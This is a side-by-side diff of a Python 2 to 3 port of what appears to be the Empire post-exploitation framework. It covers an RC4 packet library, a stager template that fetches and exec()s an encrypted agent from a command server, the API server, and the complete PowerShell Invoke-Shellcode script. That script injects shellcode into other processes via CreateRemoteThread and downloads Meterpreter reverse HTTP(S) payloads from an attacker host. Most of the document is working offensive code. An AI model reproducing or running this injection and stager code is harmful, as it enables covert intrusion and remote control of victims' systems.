0 | 0 | """ Implements Diffie-Hellman as a Jinja2 partial for use in stagers |
1 | 1 | DH code from: https://github.com/lowazo/pyDHE """ |
2 | from __future__ import print_function | |
3 | ||
4 | from builtins import bytes | |
5 | from builtins import str | |
6 | from builtins import object | |
7 | 2 | import os |
8 | 3 | import hashlib |
9 | 4 |
54 | 54 | cmd = 'ps %s' % (os.getpid()) |
55 | 55 | ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) |
56 | 56 | out, err = ps.communicate() |
57 | parts = out.split("\n") | |
57 | parts = out.split(b"\n") | |
58 | 58 | if len(parts) > 2: |
59 | processName = " ".join(parts[1].split()[4:]) | |
59 | processName = b" ".join(parts[1].split()[4:]) | |
60 | 60 | else: |
61 | 61 | processName = 'python' |
62 | ||
63 | return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion) | |
62 | return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName.decode('UTF-8'), processID, language, pyVersion) |
0 | from __future__ import print_function | |
1 | from builtins import chr | |
2 | from builtins import range | |
3 | 0 | import os |
4 | 1 | import struct |
5 | 2 | |
29 | 26 | |
30 | 27 | def rc4(key, data): |
31 | 28 | """ |
32 | Decrypt/encrypt the passed data using RC4 and the given key. | |
29 | RC4 encrypt/decrypt the given data input with the specified key. | |
30 | ||
31 | From: http://stackoverflow.com/questions/29607753/how-to-decrypt-a-file-that-encrypted-with-rc4-using-python | |
33 | 32 | """ |
34 | S,j,out=list(range(256)),0,[] | |
33 | S, j, out = list(range(256)), 0, [] | |
34 | # This might break python 2.7 | |
35 | key = bytearray(key) | |
36 | # KSA Phase | |
35 | 37 | for i in range(256): |
36 | j=(j+S[i]+ord(key[i%len(key)]))%256 | |
37 | S[i],S[j]=S[j],S[i] | |
38 | i=j=0 | |
38 | j = (j + S[i] + key[i % len(key)]) % 256 | |
39 | S[i], S[j] = S[j], S[i] | |
40 | # this might also break python 2.7 | |
41 | #data = bytearray(data) | |
42 | # PRGA Phase | |
43 | i = j = 0 | |
44 | ||
39 | 45 | for char in data: |
40 | i=(i+1)%256 | |
41 | j=(j+S[i])%256 | |
42 | S[i],S[j]=S[j],S[i] | |
43 | out.append(chr(ord(char)^S[(S[i]+S[j])%256])) | |
44 | return ''.join(out) | |
45 | ||
46 | i = (i + 1) % 256 | |
47 | j = (j + S[i]) % 256 | |
48 | S[i], S[j] = S[j], S[i] | |
49 | if sys.version[0] == "2": | |
50 | char = ord(char) | |
51 | out.append(chr(char ^ S[(S[i] + S[j]) % 256]).encode('latin-1')) | |
52 | #out = str(out) | |
53 | tmp = b''.join(out) | |
54 | return tmp | |
46 | 55 | |
47 | 56 | def parse_routing_packet(stagingKey, data): |
48 | 57 | """ |
81 | 90 | |
82 | 91 | RC4IV = data[0+offset:4+offset] |
83 | 92 | RC4data = data[4+offset:20+offset] |
84 | routingPacket = rc4(RC4IV+stagingKey, RC4data) | |
85 | sessionID = routingPacket[0:8] | |
93 | routingPacket = rc4(RC4IV+stagingKey.encode('UTF-8'), RC4data) | |
94 | ||
95 | sessionID = routingPacket[0:8].decode('UTF-8') | |
96 | ||
86 | 97 | |
87 | 98 | # B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long |
88 | 99 | (language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:]) |
100 | 111 | break |
101 | 112 | |
102 | 113 | offset += 20 + length |
103 | ||
104 | 114 | return results |
105 | 115 | |
106 | 116 | else: |
137 | 147 | |
138 | 148 | # binary pack all of the passed config values as unsigned numbers |
139 | 149 | # B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long |
150 | if isinstance(sessionID, str): | |
151 | sessionID = sessionID.encode('UTF-8') | |
152 | ||
140 | 153 | data = sessionID + struct.pack("=BBHL", 2, meta, additional, len(encData)) |
154 | RC4IV = os.urandom(4) | |
141 | 155 | |
142 | RC4IV = os.urandom(4) | |
156 | if isinstance(data, str): | |
157 | data = data.encode('UTF-8') | |
158 | if isinstance(stagingKey, str): | |
159 | stagingKey = stagingKey.encode('UTF-8') | |
160 | if isinstance(RC4IV, str): | |
161 | RC4IV = RC4IV.encode('UTF-8') | |
162 | if isinstance(encData, str): | |
163 | encData = encData.encode('UTF-8') | |
164 | ||
143 | 165 | key = RC4IV + stagingKey |
166 | ||
167 | if isinstance(key, str): | |
168 | key = key.encode('UTF-8') | |
169 | ||
144 | 170 | rc4EncData = rc4(key, data) |
171 | ||
172 | if isinstance(rc4EncData, str): | |
173 | rc4EncData = rc4EncData.encode('UTF-8') | |
145 | 174 | packet = RC4IV + rc4EncData + encData |
146 | return packet | |
175 | return packet⏎ |
0 | #!/usr/bin/env python | |
0 | #!/usr/bin/env python3 | |
1 | 1 | |
2 | 2 | """ |
3 | 3 | This file is a Jinja2 template. |
9 | 9 | stage_1 |
10 | 10 | stage_2 |
11 | 11 | """ |
12 | from __future__ import print_function | |
12 | 13 | |
14 | import copy | |
13 | 15 | import random |
14 | 16 | import string |
15 | import urllib2 | |
17 | import urllib.request as urllib | |
16 | 18 | |
17 | 19 | {% include 'common/rc4.py' %} |
18 | 20 | {% include 'common/aes.py' %} |
21 | 23 | |
22 | 24 | def post_message(uri, data): |
23 | 25 | global headers |
24 | return (urllib2.urlopen(urllib2.Request(uri, data, headers))).read() | |
26 | return (urllib.urlopen(urllib.Request(uri, data, headers))).read() | |
25 | 27 | |
26 | 28 | # generate a randomized sessionID |
27 | sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in xrange(8)) | |
29 | sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) | |
28 | 30 | |
29 | 31 | # server configuration information |
30 | 32 | stagingKey = '{{ staging_key }}' |
96 | 98 | agent = aes_decrypt_and_verify(key, response) |
97 | 99 | agent = agent.replace('REPLACE_WORKINGHOURS', WorkingHours) |
98 | 100 | agent = agent.replace('REPLACE_KILLDATE', KillDate) |
101 | ||
99 | 102 | exec(agent) |
9 | 9 | License: BSD 3-Clause |
10 | 10 | Required Dependencies: None |
11 | 11 | Optional Dependencies: None |
12 | ||
12 | ||
13 | 13 | .DESCRIPTION |
14 | 14 | |
15 | 15 | Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre |
16 | 16 | |
17 | 17 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): |
18 | 18 | |
19 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- | |
19 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- | |
20 | 20 | |
21 | 21 | Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary. |
22 | ||
22 | ||
23 | 23 | .PARAMETER ProcessID |
24 | 24 | |
25 | 25 | Process ID of the process you want to inject shellcode into. |
37 | 37 | Specifies the IP address of the attack machine waiting to receive the reverse shell |
38 | 38 | |
39 | 39 | .PARAMETER Lport |
40 | ||
40 | ||
41 | 41 | Specifies the port of the attack machine waiting to receive the reverse shell |
42 | 42 | |
43 | 43 | .PARAMETER Payload |
54 | 54 | |
55 | 55 | .PARAMETER Legacy |
56 | 56 | |
57 | Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future. | |
57 | Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future. | |
58 | 58 | |
59 | 59 | .PARAMETER Force |
60 | 60 | |
122 | 122 | .EXAMPLE |
123 | 123 | |
124 | 124 | C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) |
125 | ||
125 | ||
126 | 126 | Description |
127 | 127 | ----------- |
128 | 128 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) |
129 | 129 | Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! |
130 | ||
130 | ||
131 | 131 | .EXAMPLE |
132 | 132 | |
133 | 133 | C:\PS> Invoke-Shellcode -ListMetasploitPayloads |
134 | ||
134 | ||
135 | 135 | Payloads |
136 | 136 | -------- |
137 | 137 | windows/meterpreter/reverse_http |
154 | 154 | [ValidateNotNullOrEmpty()] |
155 | 155 | [UInt16] |
156 | 156 | $ProcessID, |
157 | ||
157 | ||
158 | 158 | [Parameter( ParameterSetName = 'RunLocal' )] |
159 | 159 | [ValidateNotNullOrEmpty()] |
160 | 160 | [Byte[]] |
161 | 161 | $Shellcode, |
162 | ||
162 | ||
163 | 163 | [Parameter( ParameterSetName = 'Metasploit' )] |
164 | 164 | [ValidateSet( 'windows/meterpreter/reverse_http', |
165 | 165 | 'windows/meterpreter/reverse_https', |
166 | 166 | IgnoreCase = $True )] |
167 | 167 | [String] |
168 | 168 | $Payload = 'windows/meterpreter/reverse_http', |
169 | ||
169 | ||
170 | 170 | [Parameter( ParameterSetName = 'ListPayloads' )] |
171 | 171 | [Switch] |
172 | 172 | $ListMetasploitPayloads, |
173 | ||
173 | ||
174 | 174 | [Parameter( Mandatory = $True, |
175 | 175 | ParameterSetName = 'Metasploit' )] |
176 | 176 | [ValidateNotNullOrEmpty()] |
177 | 177 | [String] |
178 | 178 | $Lhost = '127.0.0.1', |
179 | ||
179 | ||
180 | 180 | [Parameter( Mandatory = $True, |
181 | 181 | ParameterSetName = 'Metasploit' )] |
182 | 182 | [ValidateRange( 1,65535 )] |
183 | 183 | [Int] |
184 | 184 | $Lport = 8443, |
185 | ||
185 | ||
186 | 186 | [Parameter( ParameterSetName = 'Metasploit' )] |
187 | 187 | [ValidateNotNull()] |
188 | 188 | [String] |
197 | 197 | [ValidateNotNull()] |
198 | 198 | [Switch] |
199 | 199 | $Proxy = $False, |
200 | ||
200 | ||
201 | 201 | [Switch] |
202 | 202 | $Force = $False |
203 | 203 | ) |
204 | 204 | |
205 | 205 | Set-StrictMode -Version 2.0 |
206 | ||
206 | ||
207 | 207 | # List all available Metasploit payloads and exit the function |
208 | 208 | if ($PsCmdlet.ParameterSetName -eq 'ListPayloads') |
209 | 209 | { |
210 | 210 | $AvailablePayloads = (Get-Command Invoke-Shellcode).Parameters['Payload'].Attributes | |
211 | 211 | Where-Object {$_.TypeId -eq [System.Management.Automation.ValidateSetAttribute]} |
212 | ||
212 | ||
213 | 213 | foreach ($Payload in $AvailablePayloads.ValidValues) |
214 | 214 | { |
215 | 215 | New-Object PSObject -Property @{ Payloads = $Payload } |
216 | 216 | } |
217 | ||
217 | ||
218 | 218 | Return |
219 | 219 | } |
220 | 220 | |
224 | 224 | # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive |
225 | 225 | Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null |
226 | 226 | } |
227 | ||
227 | ||
228 | 228 | function Local:Get-DelegateType |
229 | 229 | { |
230 | 230 | Param |
231 | 231 | ( |
232 | 232 | [OutputType([Type])] |
233 | ||
233 | ||
234 | 234 | [Parameter( Position = 0)] |
235 | 235 | [Type[]] |
236 | 236 | $Parameters = (New-Object Type[](0)), |
237 | ||
237 | ||
238 | 238 | [Parameter( Position = 1 )] |
239 | 239 | [Type] |
240 | 240 | $ReturnType = [Void] |
249 | 249 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') |
250 | 250 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) |
251 | 251 | $MethodBuilder.SetImplementationFlags('Runtime, Managed') |
252 | ||
252 | ||
253 | 253 | Write-Output $TypeBuilder.CreateType() |
254 | 254 | } |
255 | 255 | |
258 | 258 | Param |
259 | 259 | ( |
260 | 260 | [OutputType([IntPtr])] |
261 | ||
261 | ||
262 | 262 | [Parameter( Position = 0, Mandatory = $True )] |
263 | 263 | [String] |
264 | 264 | $Module, |
265 | ||
265 | ||
266 | 266 | [Parameter( Position = 1, Mandatory = $True )] |
267 | 267 | [String] |
268 | 268 | $Procedure |
279 | 279 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) |
280 | 280 | $tmpPtr = New-Object IntPtr |
281 | 281 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) |
282 | ||
282 | ||
283 | 283 | # Return the address of the function |
284 | 284 | Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) |
285 | 285 | } |
294 | 294 | $LittleEndianByteArray = New-Object Byte[](0) |
295 | 295 | $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } } |
296 | 296 | [System.Array]::Reverse($LittleEndianByteArray) |
297 | ||
297 | ||
298 | 298 | Write-Output $LittleEndianByteArray |
299 | 299 | } |
300 | ||
300 | ||
301 | 301 | $CallStub = New-Object Byte[](0) |
302 | ||
302 | ||
303 | 303 | if ($IntSizePtr -eq 8) |
304 | 304 | { |
305 | 305 | [Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode |
320 | 320 | $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread |
321 | 321 | $CallStub += 0xFF,0xD0 # CALL EAX |
322 | 322 | } |
323 | ||
323 | ||
324 | 324 | Write-Output $CallStub |
325 | 325 | } |
326 | 326 | |
328 | 328 | { |
329 | 329 | # Open a handle to the process you want to inject into |
330 | 330 | $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF) |
331 | ||
331 | ||
332 | 332 | if (!$hProcess) |
333 | 333 | { |
334 | 334 | Throw "Unable to open a process handle for PID: $ProcessID" |
340 | 340 | { |
341 | 341 | # Determine is the process specified is 32 or 64 bit |
342 | 342 | $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null |
343 | ||
343 | ||
344 | 344 | if ((!$IsWow64) -and $PowerShell32bit) |
345 | 345 | { |
346 | 346 | Throw 'Unable to inject 64-bit shellcode from within 32-bit Powershell. Use the 64-bit version of Powershell if you want this to work.' |
351 | 351 | { |
352 | 352 | Throw 'No shellcode was placed in the $Shellcode32 variable!' |
353 | 353 | } |
354 | ||
354 | ||
355 | 355 | $Shellcode = $Shellcode32 |
356 | 356 | Write-Verbose 'Injecting into a Wow64 process.' |
357 | 357 | Write-Verbose 'Using 32-bit shellcode.' |
362 | 362 | { |
363 | 363 | Throw 'No shellcode was placed in the $Shellcode64 variable!' |
364 | 364 | } |
365 | ||
365 | ||
366 | 366 | $Shellcode = $Shellcode64 |
367 | 367 | Write-Verbose 'Using 64-bit shellcode.' |
368 | 368 | } |
373 | 373 | { |
374 | 374 | Throw 'No shellcode was placed in the $Shellcode32 variable!' |
375 | 375 | } |
376 | ||
376 | ||
377 | 377 | $Shellcode = $Shellcode32 |
378 | 378 | Write-Verbose 'Using 32-bit shellcode.' |
379 | 379 | } |
380 | 380 | |
381 | 381 | # Reserve and commit enough memory in remote process to hold the shellcode |
382 | 382 | $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) |
383 | ||
383 | ||
384 | 384 | if (!$RemoteMemAddr) |
385 | 385 | { |
386 | 386 | Throw "Unable to allocate shellcode memory in PID: $ProcessID" |
387 | 387 | } |
388 | ||
388 | ||
389 | 389 | Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))" |
390 | 390 | |
391 | 391 | # Copy shellcode into the previously allocated memory |
398 | 398 | { |
399 | 399 | # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread. |
400 | 400 | $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32 |
401 | ||
401 | ||
402 | 402 | Write-Verbose 'Emitting 32-bit assembly call stub.' |
403 | 403 | } |
404 | 404 | else |
405 | 405 | { |
406 | 406 | # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread. |
407 | 407 | $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64 |
408 | ||
408 | ||
409 | 409 | Write-Verbose 'Emitting 64-bit assembly call stub.' |
410 | 410 | } |
411 | 411 | |
412 | 412 | # Allocate inline assembly stub |
413 | 413 | $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX) |
414 | ||
414 | ||
415 | 415 | if (!$RemoteStubAddr) |
416 | 416 | { |
417 | 417 | Throw "Unable to allocate thread call stub memory in PID: $ProcessID" |
418 | 418 | } |
419 | ||
419 | ||
420 | 420 | Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))" |
421 | 421 | |
422 | 422 | # Write 32-bit assembly stub to remote process memory space |
424 | 424 | |
425 | 425 | # Execute shellcode as a remote thread |
426 | 426 | $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero) |
427 | ||
427 | ||
428 | 428 | if (!$ThreadHandle) |
429 | 429 | { |
430 | 430 | Throw "Unable to launch remote thread in PID: $ProcessID" |
444 | 444 | Throw 'No shellcode was placed in the $Shellcode32 variable!' |
445 | 445 | return |
446 | 446 | } |
447 | ||
447 | ||
448 | 448 | $Shellcode = $Shellcode32 |
449 | 449 | Write-Verbose 'Using 32-bit shellcode.' |
450 | 450 | } |
455 | 455 | Throw 'No shellcode was placed in the $Shellcode64 variable!' |
456 | 456 | return |
457 | 457 | } |
458 | ||
458 | ||
459 | 459 | $Shellcode = $Shellcode64 |
460 | 460 | Write-Verbose 'Using 64-bit shellcode.' |
461 | 461 | } |
462 | ||
462 | ||
463 | 463 | # Allocate RWX memory for the shellcode |
464 | 464 | $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) |
465 | 465 | if (!$BaseAddress) |
466 | 466 | { |
467 | 467 | Throw "Unable to allocate shellcode memory in PID: $ProcessID" |
468 | 468 | } |
469 | ||
469 | ||
470 | 470 | Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))" |
471 | 471 | |
472 | 472 | # Copy shellcode to RWX buffer |
473 | 473 | [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length) |
474 | ||
474 | ||
475 | 475 | # Get address of ExitThread function |
476 | 476 | $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread |
477 | ||
477 | ||
478 | 478 | if ($PowerShell32bit) |
479 | 479 | { |
480 | 480 | $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32 |
481 | ||
481 | ||
482 | 482 | Write-Verbose 'Emitting 32-bit assembly call stub.' |
483 | 483 | } |
484 | 484 | else |
485 | 485 | { |
486 | 486 | $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64 |
487 | ||
487 | ||
488 | 488 | Write-Verbose 'Emitting 64-bit assembly call stub.' |
489 | 489 | } |
490 | 490 | |
494 | 494 | { |
495 | 495 | Throw "Unable to allocate thread call stub." |
496 | 496 | } |
497 | ||
497 | ||
498 | 498 | Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))" |
499 | 499 | |
500 | 500 | # Copy call stub to RWX buffer |
509 | 509 | |
510 | 510 | # Wait for shellcode thread to terminate |
511 | 511 | $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null |
512 | ||
512 | ||
513 | 513 | $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) |
514 | 514 | $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) |
515 | 515 | |
522 | 522 | { |
523 | 523 | $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) |
524 | 524 | $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) |
525 | ||
525 | ||
526 | 526 | $64bitCPU = $true |
527 | 527 | } |
528 | 528 | else |
549 | 549 | $RootInvocation = $MyInvocation.Line |
550 | 550 | |
551 | 551 | $Response = $True |
552 | ||
552 | ||
553 | 553 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue( "Do you want to launch the payload from x86 Powershell?", |
554 | 554 | "Attempt to execute 32-bit shellcode from 64-bit Powershell. Note: This process takes about one minute. Be patient! You will also see some artifacts of the script loading in the other process." ) ) ) { } |
555 | ||
555 | ||
556 | 556 | if ( !$Response ) |
557 | 557 | { |
558 | 558 | # User opted not to launch the 32-bit payload from 32-bit PowerShell. Exit function |
580 | 580 | # Exit the script since the shellcode will be running from x86 PowerShell |
581 | 581 | Return |
582 | 582 | } |
583 | ||
583 | ||
584 | 584 | $Response = $True |
585 | ||
585 | ||
586 | 586 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue( "Do you know what you're doing?", |
587 | 587 | "About to download Metasploit payload '$($Payload)' LHOST=$($Lhost), LPORT=$($Lport)" ) ) ) { } |
588 | ||
588 | ||
589 | 589 | if ( !$Response ) |
590 | 590 | { |
591 | 591 | # User opted not to carry out download of Metasploit payload. Exit function |
592 | 592 | Return |
593 | 593 | } |
594 | ||
594 | ||
595 | 595 | switch ($Payload) |
596 | 596 | { |
597 | 597 | 'windows/meterpreter/reverse_http' |
598 | 598 | { |
599 | 599 | $SSL = '' |
600 | 600 | } |
601 | ||
601 | ||
602 | 602 | 'windows/meterpreter/reverse_https' |
603 | 603 | { |
604 | 604 | $SSL = 's' |
606 | 606 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True} |
607 | 607 | } |
608 | 608 | } |
609 | ||
610 | if ($Legacy) | |
609 | ||
610 | if ($Legacy) | |
611 | 611 | { |
612 | 612 | # Old Meterpreter handler expects 'INITM' in the URI in order to initiate stage 0 |
613 | 613 | $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" |
618 | 618 | $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_} |
619 | 619 | $SumTest = $False |
620 | 620 | |
621 | while ($SumTest -eq $False) | |
621 | while ($SumTest -eq $False) | |
622 | 622 | { |
623 | 623 | $GeneratedUri = $CharArray | Get-Random -Count 4 |
624 | 624 | $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92) |
626 | 626 | |
627 | 627 | $RequestUri = -join $GeneratedUri |
628 | 628 | |
629 | $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)" | |
630 | } | |
631 | ||
629 | $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)" | |
630 | } | |
631 | ||
632 | 632 | $Uri = New-Object Uri($Request) |
633 | 633 | $WebClient = New-Object System.Net.WebClient |
634 | 634 | $WebClient.Headers.Add('user-agent', "$UserAgent") |
635 | ||
635 | ||
636 | 636 | if ($Proxy) |
637 | 637 | { |
638 | 638 | $WebProxyObject = New-Object System.Net.WebProxy |
639 | 639 | $ProxyAddress = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyServer |
640 | ||
640 | ||
641 | 641 | # if there is no proxy set, then continue without it |
642 | if ($ProxyAddress) | |
643 | { | |
644 | ||
642 | if ($ProxyAddress) | |
643 | { | |
644 | ||
645 | 645 | $WebProxyObject.Address = $ProxyAddress |
646 | 646 | $WebProxyObject.UseDefaultCredentials = $True |
647 | 647 | $WebClientObject.Proxy = $WebProxyObject |
654 | 654 | } |
655 | 655 | catch |
656 | 656 | { |
657 | Throw "$($Error[0].Exception.InnerException.InnerException.Message)" | |
657 | Throw "$($Error[0])" | |
658 | 658 | } |
659 | 659 | [Byte[]] $Shellcode64 = $Shellcode32 |
660 | 660 | |
726 | 726 | $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle |
727 | 727 | $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) |
728 | 728 | $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) |
729 | ||
729 | ||
730 | 730 | Write-Verbose "Injecting shellcode into PID: $ProcessId" |
731 | ||
731 | ||
732 | 732 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', |
733 | 733 | "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) ) |
734 | 734 | { |
750 | 750 | $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject |
751 | 751 | $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int]) |
752 | 752 | $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) |
753 | ||
753 | ||
754 | 754 | Write-Verbose "Injecting shellcode into PowerShell" |
755 | ||
755 | ||
756 | 756 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', |
757 | 757 | "Injecting shellcode into the running PowerShell process!" ) ) |
758 | 758 | { |
759 | 759 | Inject-LocalShellcode |
760 | 760 | } |
761 | } | |
761 | } | |
762 | 762 | }⏎ |
77 | 77 | """ |
78 | 78 | |
79 | 79 | # generate a randomized API token |
80 | apiToken = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
80 | rng = random.SystemRandom() | |
81 | apiToken = ''.join(rng.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
81 | 82 | |
82 | 83 | execute_db_query(conn, "UPDATE config SET api_current_token=?", [apiToken]) |
83 | 84 | |
94 | 95 | permanentToken = execute_db_query(conn, "SELECT api_permanent_token FROM config")[0] |
95 | 96 | permanentToken = permanentToken[0] |
96 | 97 | if not permanentToken: |
97 | permanentToken = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
98 | rng = random.SystemRandom() | |
99 | permanentToken = ''.join(rng.choice(string.ascii_lowercase + string.digits) for x in range(40)) | |
98 | 100 | execute_db_query(conn, "UPDATE config SET api_permanent_token=?", [permanentToken]) |
99 | 101 | |
100 | 102 | return permanentToken |
304 | 306 | """ |
305 | 307 | |
306 | 308 | stagers = [] |
307 | for stagerName, stager in main.stagers.stagers.iteritems(): | |
309 | for stagerName, stager in main.stagers.stagers.items(): | |
308 | 310 | info = copy.deepcopy(stager.info) |
309 | 311 | info['options'] = stager.options |
310 | 312 | info['Name'] = stagerName |
322 | 324 | return make_response(jsonify({'error': 'stager name %s not found, make sure to use [os]/[name] format, ie. windows/dll' %(stager_name)}), 404) |
323 | 325 | |
324 | 326 | stagers = [] |
325 | for stagerName, stager in main.stagers.stagers.iteritems(): | |
327 | for stagerName, stager in main.stagers.stagers.items(): | |
326 | 328 | if stagerName == stager_name: |
327 | 329 | info = copy.deepcopy(stager.info) |
328 | 330 | info['options'] = stager.options |
357 | 359 | stager = main.stagers.stagers[stagerName] |
358 | 360 | |
359 | 361 | # set all passed options |
360 | for option, values in request.json.iteritems(): | |
362 | for option, values in request.json.items(): | |
361 | 363 | if option != 'StagerName': |
362 | 364 | if option not in stager.options: |
363 | 365 | return make_response(jsonify({'error': 'Invalid option %s, check capitalization.' %(option)}), 400) |
364 | 366 | stager.options[option]['Value'] = values |
365 | 367 | |
366 | 368 | # validate stager options |
367 | for option, values in stager.options.iteritems(): | |
369 | for option, values in stager.options.items(): | |
368 | 370 | if values['Required'] and ((not values['Value']) or (values['Value'] == '')): |
369 | 371 | return make_response(jsonify({'error': 'required stager options missing'}), 400) |
370 | 372 | |
387 | 389 | """ |
388 | 390 | |
389 | 391 | modules = [] |
390 | for moduleName, module in main.modules.modules.iteritems(): | |
392 | for moduleName, module in main.modules.modules.items(): | |
391 | 393 | moduleInfo = copy.deepcopy(module.info) |
392 | 394 | moduleInfo['options'] = module.options |
393 | 395 | moduleInfo['Name'] = moduleName |
430 | 432 | module = main.modules.modules[module_name] |
431 | 433 | |
432 | 434 | # set all passed module options |
433 | for key, value in request.json.iteritems(): | |
435 | for key, value in request.json.items(): | |
434 | 436 | if key not in module.options: |
435 | 437 | return make_response(jsonify({'error': 'invalid module option'}), 400) |
436 | 438 | |
439 | 441 | # validate module options |
440 | 442 | sessionID = module.options['Agent']['Value'] |
441 | 443 | |
442 | for option, values in module.options.iteritems(): | |
444 | for option, values in module.options.items(): | |
443 | 445 | if values['Required'] and ((not values['Value']) or (values['Value'] == '')): |
444 | 446 | return make_response(jsonify({'error': 'required module option missing'}), 400) |
445 | 447 | |
542 | 544 | |
543 | 545 | modules = [] |
544 | 546 | |
545 | for moduleName, module in main.modules.modules.iteritems(): | |
547 | for moduleName, module in main.modules.modules.items(): | |
546 | 548 | if (searchTerm.lower() == '') or (searchTerm.lower() in moduleName.lower()) or (searchTerm.lower() in ("".join(module.info['Description'])).lower()) or (searchTerm.lower() in ("".join(module.info['Comments'])).lower()) or (searchTerm.lower() in ("".join(module.info['Author'])).lower()): |
547 | 549 | |
